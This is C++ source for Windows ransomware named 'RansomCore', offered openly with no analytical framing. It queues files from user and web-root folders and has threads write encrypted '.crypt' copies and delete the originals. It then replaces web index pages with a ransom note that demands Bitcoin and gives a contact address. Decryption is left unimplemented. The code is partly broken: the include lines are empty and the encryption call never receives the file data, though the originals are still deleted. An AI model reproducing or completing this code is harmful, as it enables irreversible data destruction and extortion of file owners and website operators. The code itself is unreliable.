#include #include #include #include #include #include #include #include #include #include namespace fs = std::filesystem; class RansomCore { private: HCRYPTPROV hCryptProv; HCRYPTKEY hKey; std::mutex threadMutex; std::queue fileQueue; std::vector workers; int encryptedCount; std::string ransomWallet; std::vector criticalDirs; void InitCrypto() { if (!CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { throw std::runtime_error("Crypto context failed"); } if (!CryptGenKey(hCryptProv, CALG_AES_256, CRYPT_EXPORTABLE, &hKey)) { throw std::runtime_error("Key generation failed"); } } void EncryptFile(const fs::path& filePath) { try { std::ifstream in(filePath, std::ios::binary | std::ios::ate); if (!in.is_open()) return; std::streamsize size = in.tellg(); in.seekg(0, std::ios::beg); std::vector buffer(size); if (!in.read(reinterpret_cast(buffer.data()), size)) { in.close(); return; } in.close(); DWORD encryptedSize = size + 1024; std::vector encrypted(encryptedSize); DWORD actualSize = encryptedSize; if (!CryptEncrypt(hKey, NULL, TRUE, 0, encrypted.data(), &actualSize, encryptedSize)) { return; } encrypted.resize(actualSize); fs::path encryptedPath = filePath; encryptedPath += ".crypt"; std::ofstream out(encryptedPath, std::ios::binary); if (!out.write(reinterpret_cast(encrypted.data()), encrypted.size())) { return; } out.close(); fs::remove(filePath); std::lock_guard lock(threadMutex); encryptedCount++; if (encryptedCount % 100 == 0) { printf("[*] Encrypted %d files...\n", encryptedCount); } } catch (...) { // Silent fail, keep moving } } void ScanDirectory(const fs::path& dir) { try { for (const auto& entry : fs::recursive_directory_iterator(dir)) { if (fs::is_regular_file(entry.path())) { std::lock_guard lock(threadMutex); fileQueue.push(entry.path()); } } } catch (...) {} } void WorkerThread() { while (true) { fs::path filePath; { std::lock_guard lock(threadMutex); if (fileQueue.empty()) break; filePath = fileQueue.front(); fileQueue.pop(); } EncryptFile(filePath); } } void BuildDefaceHTML() { std::string html = R"( LOCKED

⛔ ENCRYPTED

All files are locked with AES-256.

Send 0.5 BTC to: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa

Contact: ransom@onionmail.org

)"; for (auto& idx : {"index.html", "index.php", "default.html"}) { fs::path indexPath = fs::path("C:/xampp/htdocs") / idx; if (fs::exists(indexPath)) { fs::remove(indexPath); } std::ofstream out(indexPath); out << html; out.close(); } } public: RansomCore() : hCryptProv(NULL), hKey(NULL), encryptedCount(0), ransomWallet("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa") { criticalDirs = { "C:/Users/Public/Documents", "C:/xampp/htdocs", "C:/inetpub/wwwroot", "C:/Users/Administrator/Desktop" }; } ~RansomCore() { if (hKey) CryptDestroyKey(hKey); if (hCryptProv) CryptReleaseContext(hCryptProv, 0); } void Execute() { printf("[*] Initializing ransomware core...\n"); InitCrypto(); for (const auto& dir : criticalDirs) { if (fs::exists(dir) && fs::is_directory(dir)) { printf("[*] Scanning: %s\n", dir.c_str()); ScanDirectory(dir); } } printf("[*] Total files queued: %zu\n", fileQueue.size()); int threadCount = std::thread::hardware_concurrency(); if (threadCount == 0) threadCount = 4; printf("[*] Spawning %d worker threads...\n", threadCount); for (int i = 0; i < threadCount; ++i) { workers.emplace_back(&RansomCore::WorkerThread, this); } for (auto& t : workers) { if (t.joinable()) t.join(); } BuildDefaceHTML(); printf("\n[+] Encryption complete, boss man!\n"); printf("[+] Total files encrypted: %d\n", encryptedCount); printf("[+] Ransom note deployed on web root.\n"); } bool Decrypt(const std::string& passphrase) { // Decryption logic would reverse the process printf("[*] Decryption not implemented in this demo, boss man.\n"); return false; } }; int main() { RansomCore core; core.Execute(); return 0; }